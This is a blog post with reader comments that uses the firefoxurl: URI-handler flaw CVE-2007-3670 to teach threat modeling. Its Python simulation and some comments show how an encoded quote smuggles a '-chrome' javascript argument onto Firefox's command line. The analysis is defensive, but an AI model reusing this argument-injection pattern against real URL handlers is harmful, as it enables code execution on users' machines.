Threat Modeling Again, Threat Modeling in Practice

I've been writing a LOT about threat modeling recently but one of the things I haven't talked about is the practical value of the threat modeling process.

Here at Microsoft, we've totally drunk the threat modeling Kool-Aid.  One of Adam Shostack's papers on threat modeling has the following quote from Michael Howard:

"If we had our hands tied behind our backs (we don't) and could do only one thing to improve software security... we would do threat modeling every day of the week."

I want to talk about a real-world example of a security problem that threat modeling would hopefully have avoided.

I happen to love this problem, because it does a really good job of showing how the evolution of complicated systems can introduce unexpected security problems.  The particular issue I'm talking about is known as CVE-2007-3670.  I seriously recommend people go to the CVE site and read the references to the problem; they provide an excellent background on the issue.

CVE-2007-3670 describes a vulnerability in the Mozilla Firefox browser that uses Internet Explorer as an exploit vector. There's been a TON written about this particular issue (see the references on the CVE page for most of the discussion), and I don't want to go into the pros and cons of whether this is an IE or a Firefox bug.  I only want to discuss this particular issue from a threat modeling standpoint.

There are four components involved in this vulnerability, each with their own threat model:

  • The Firefox browser.
  • Internet Explorer.
  • The "firefoxurl:" URI registration.
  • The Windows Shell (explorer).

Each of the components in question plays a part in the vulnerability.  Let's take them in turn.

  • The Firefox browser provides a command line argument "-chrome" which allows you to load the chrome specified at a particular location.
  • Internet Explorer provides an extensibility mechanism which allows 3rd parties to register specific URI handlers.
  • The "firefoxurl:" URL registration, which uses the simplest form of URL handler registration: it instructs the shell to execute "<firefoxpath>\firefox.exe -url "%1" -requestPending".  Apparently this was added to Firefox to allow web site authors to force the user to use Firefox when viewing a link.  I believe the "-url" switch (which isn't included in the list of Firefox command line arguments above) instructs Firefox to treat the contents of %1 as a URL.
  • The Windows Shell, which passes the command line on to the Firefox application.
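As a sketch of what the simple-form registration looks like in the registry (the install path and the "Firefox URL" display string are my reconstruction, not copied from an actual Firefox install):

```
HKEY_CLASSES_ROOT
  firefoxurl
    (Default)    = "Firefox URL"
    URL Protocol = ""
    shell
      open
        command
          (Default) = "C:\Program Files\Mozilla Firefox\firefox.exe" -url "%1" -requestPending
```

With this form of registration, the shell simply substitutes the URL for "%1" and launches the resulting command line - there's no code between the URL and the target application's argument parser.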

I'm going to attempt to draw the relevant part of the diagrams for IE and Firefox.  These are just my interpretations of what is happening; it's entirely possible that the dataflow is different in real life.



This diagram shows the flow of control from the user into Firefox (remember: I'm JUST diagramming a small part of the actual component diagram).  One of the things that makes Firefox's chrome engine so attractive is that it's easy to modify the chrome, because the Firefox chrome is simply javascript.  Since that javascript runs with the same privileges as the current user, this isn't a big deal - there's no opportunity for elevation of privilege there.  But there is one important thing to remember here: Firefox has a security assumption that the -chrome command switch is only provided by the user.  Because it executes that javascript with full trust, it effectively accepts executable code from the command line.
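To make that assumption concrete, a legitimate use of the switch might look something like this (a hypothetical invocation; the chrome URL is illustrative):

```
firefox.exe -chrome chrome://browser/content/browser.xul
```

Whatever chrome is named there is loaded and run with full trust - which is fine as long as only the interactive user can put things on Firefox's command line.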


Internet Explorer:


This diagram describes my interpretation of how IE (actually urlmon.dll in this case) handles incoming URLs.  It's just my interpretation, based on the information contained here (at a minimum, I suspect it's missing some trust boundaries).  The web page hands IE a URL, IE looks the URL up in the registry and retrieves a URL handler.  Depending on how the URL handler was registered, IE either invokes the shell on the path portion of the URL, or, if the URL handler was registered as an async protocol handler, it hands the URL to the async protocol handler.

I'm not going to do a diagram for the firefoxurl handler or the shell, since they're either not interesting or are covered in the diagram above - in the firefoxurl handler case, the firefoxurl handler is registered as being handled by the shell.  In that case, Internet Explorer will pass the URL into the shell, which will happily pass it on to the URL handler (which, in this case, is Firefox).
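To see why this chain is dangerous, here's a small Python sketch of the flow described above.  This is a simulation of the behavior, not the actual IE/shell code, and the attack URL is illustrative - the key point is that the URL gets percent-decoded before it's substituted into the registered command template:

```python
# Hypothetical simulation of the firefoxurl: handler chain.
# IE/the shell percent-decodes the incoming URL, then substitutes it
# into the command template registered for the scheme.
from urllib.parse import unquote

# The command template from the firefoxurl: registration.
COMMAND_TEMPLATE = 'firefox.exe -url "%1" -requestPending'

def build_command_line(url: str) -> str:
    decoded = unquote(url)                    # %22 becomes a literal quote here
    return COMMAND_TEMPLATE.replace("%1", decoded)

# A benign URL stays safely inside the quoted -url argument:
print(build_command_line("firefoxurl:test"))
# firefox.exe -url "firefoxurl:test" -requestPending

# A URL carrying an encoded quote (%22) breaks out of the -url argument
# and smuggles a -chrome switch onto Firefox's command line:
evil = 'firefoxurl:test%22%20-chrome%20%22javascript:alert(1)'
print(build_command_line(evil))
# firefox.exe -url "firefoxurl:test" -chrome "javascript:alert(1)" -requestPending
```

Because Firefox trusts -chrome implicitly, the injected switch runs the attacker's javascript with full privileges - the two components' individually reasonable assumptions compose into a vulnerability.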


That's a lot of text and pictures; tomorrow I'll discuss what I think went wrong and how using threat modeling could have avoided the issue.  I also want to look at BOTH of the threat models and see what they indicate.


Obviously, the contents of this post are my own opinion and in no way reflect the opinions of Microsoft.

Comments (11)

  1. Anonymous says:

    > I’m going to attempt to draw the relevant part of the

    > diagrams for IE and Firefox.

    But then the first diagram asserts that the user is passing a command line to Firefox.  This ambiguity is exactly part of the cause of the security problem.  The model needs to show that the command line is coming from unknown origins via an untrusted application into Firefox.  (As a side effect, that will make it clearer where validation needs to be performed, and why.)

    > Since the javascript being run runs with the same privileges

    > as the current user, this isn’t a big deal

    If it’s unclear where the Javascript came from and whether the user approved it, then it is a big deal.  Low-integrity operations in Vista’s Internet Explorer should be a big help.  Low-integrity operations in other applications should be an equally big help.

    > Firefox has a security assumption

    Yup, a big mistake.

  2. Norman, the threat model DOES show that – there’s a trust boundary between the user and Firefox.

    What’s not clear is what level of validation needs to be done to ensure that the command line is safe.

  3. Anonymous says:

    This is actually a very cool example to use with the threat modelling discussion that you’ve had going the last little while.  I look forward to the rest of it.

    Not to get into the muck of this being an IE vs Firefox flaw, but I did find this humorous:

    [Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data."]

    I’m no expert, but that sounds like a fancy way of saying "oh fine, we’ll do some validity checks before trusting and acting on arbitrary data".  They certainly are not preventing IE from doing anything, but rather taking responsibility for the actions Firefox chooses to perform.

    Anyway, good example.

  4. Anonymous says:

    LOL Nick.

    I run into that type of thinking all the time.  "Hey, there is a problem in my software when this other application passes me stuff I don’t like."  Let’s fix the other application.

    Sure, sometimes there is business value to doing that, but in the case of a security exploit, I would find it hard to justify.

    It will be interesting to see what Larry says.  This threat modeling is clicking a lot better with a real world example.  In fact, I have a better understanding of what the issue is now that I have seen the threat model.

  5. Tim, consider each diagram and think about what they say and what their assumptions are.

    Then consider how the introduction of the firefoxurl handler changes the assumptions under which the firefox command line handler operates.

  6. Mike Dimmick says:

    The issue is at least partly that IE or the Windows Shell decodes URL-encoded (%xx) characters before passing them to the URL handler. This allows the attacker to insert (literally)

    " -chrome:"<attackscript>

    into the command line of Firefox.

    My solution would be to add an extra option -firefoxurl at the beginning of the command arguments, where this argument then suppresses any full-trust elements. Alternatively, replace the non-cohesive simple URL handler with a proper async URL handler, which will get the URL as an argument to a function call. One of Firefox’s problems is that it isn’t really designed as a Windows app – there are places where they use TCP sockets for inter-thread communication, in lieu of Unix-domain sockets. (Or, at least, they did a year ago – I don’t keep up with Firefox).

    The encoded parts of the URL probably shouldn’t be decoded by IE/Shell before passing to other components, but I’m not an expert on URL parsing, and this will have a potential compatibility impact on any other URL handler. That said, decoding %2f to / (for example) changes the meaning of the URL. The only reason I can think of to decode first is in case there are URL-encoded characters in the scheme part, but that’s not allowed in RFC 1738. It says (section 2.2):

    "On the other hand, characters that are not required to be encoded (including alphanumerics) may be encoded within the scheme-specific part of a URL, as long as they are not being used for a reserved purpose."

    (note "scheme-specific part", i.e. the part after the scheme). The BNF in RFC 2396 (which supersedes 1738) does not permit encoded characters at this point either.

  7. Anonymous says:

    Larry: It’s not just IE, but QT too.  See CVE-2006-4965 for more info on the QT/Fx bug.

  8. Mike, that’s not quite true.  The attacker actually inserted:

     " -chrome:"javascript:<attack script>""

    The first " terminated the -url command line, which opened up the -chrome switch.  Their fix was to have firefox treat everything on the command line after the -url switch as a URL.

    More on this in my next post.

  9. Anonymous says:

    Yesterday I presented my version of the diagrams for Firefox’s command line handler and the IE/URLMON’s

  10. Anonymous says:

    > there’s a trust boundary between the user and Firefox

    I understand it shows a trust boundary, but it’s still playing with ambiguities by calling one side the user.  That ambiguity is really part of the problem.  If the user really asked for the operation then the user should be trusted, the same as when the user clicks "continue" on a UAC prompt.  When the requestor is really some unverified participant of unknown origin, we should not assume that the requestor is the user and the trust boundary should be fortified.

    Of course very few users will be able to answer properly when a fortified Firefox asks "do you really want to invoke this url: -chrome:blahblahblah" or "do you really want to invoke this chrome: blahblahblah".  But it would still be better to force the question to be asked, than to blindly obey the url.

  11. Anonymous says:

    I want to wrap up the threat modeling posts with a summary and some comments on the entire process. Yeah,
